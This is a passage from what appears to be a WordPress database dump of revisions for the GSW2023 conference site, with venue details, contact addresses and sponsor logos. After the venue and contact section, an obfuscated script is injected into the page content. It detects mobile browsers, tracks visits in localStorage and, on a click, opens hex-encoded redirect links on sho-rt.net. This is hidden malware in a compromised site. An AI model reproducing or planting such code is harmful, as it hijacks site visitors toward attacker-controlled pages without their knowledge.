rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 10:47:02','2023-09-04 10:47:02','',3066,'https://gsw2023.com/?p=5451',0,'revision','',0),
(5452,1,'2023-09-04 10:48:31','2023-09-04 10:48:31','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: 